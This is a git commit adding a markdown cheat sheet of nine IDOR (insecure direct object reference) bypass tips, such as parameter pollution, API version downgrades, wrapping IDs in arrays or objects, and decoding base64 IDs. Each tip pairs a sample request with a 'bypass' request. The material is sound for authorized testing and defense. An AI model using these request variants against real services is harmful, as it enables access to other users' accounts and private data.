Account Takover [1]

Create account IDOR (Insecure direct object references) tips and add 9 tips
2024-12-20 03:16:11 +00:00 · 2020-09-04 17:41:20 +07:00 · 2020-09-04 17:41:20 +07:00 · 233ec1f5b7
commit 233ec1f5b7
parent d5aeb8dae8
1 changed files with 99 additions and 0 deletions
--- a/IDOR.md
+++ b/IDOR.md
@ -0,0 +1,99 @@
+## IDOR (Insecure Direct Object Reference)
+
+1. Add parameters onto the endpoints for example, if there was
+```html
+GET /api/v1/getuser
+[...]
+```
+Try this to bypass
+```html
+GET /api/v1/getuser?id=1234
+[...]
+```
+
+2. HTTP Parameter pollution
+
+```html
+POST /api/get_profile
+[...]
+user_id=hacker_id&user_id=victim_id
+```
+
+3. Add .json to the endpoint
+
+```html
+GET /v2/GetData/1234
+[...]
+```
+Try this to bypass
+```html
+GET /v2/GetData/1234.json
+[...]
+```
+
+4. Test on outdated API Versions
+
+```html
+POST /v2/GetData
+[...]
+id=123
+```
+Try this to bypass
+```html
+POST /v1/GetData
+[...]
+id=123
+```
+
+5. Wrap the ID with an array.
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":111}
+```
+Try this to bypass
+```html
+POST /api/get_profile
+[...]
+{"id":[111]}
+```
+
+6. Wrap the ID with a JSON object
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":111}
+```
+Try this to bypass
+```html
+POST /api/get_profile
+[...]
+{"user_id":{"user_id":111}}
+```
+
+7. JSON Parameter Pollution
+
+```html
+POST /api/get_profile
+[...]
+{"user_id":"hacker_id","user_id":"victim_id"}
+```
+
+8. Try decode the ID, if the ID encoded using md5,base64,etc
+```html
+GET /GetUser/dmljdGltQG1haWwuY29t
+[...]
+```
+dmljdGltQG1haWwuY29t => victim@mail.com
+
+9. If the website using graphql, try to find IDOR using graphql!
+```html
+GET /graphql
+[...]
+```
+```html
+GET /graphql.php?query=
+[...]
+```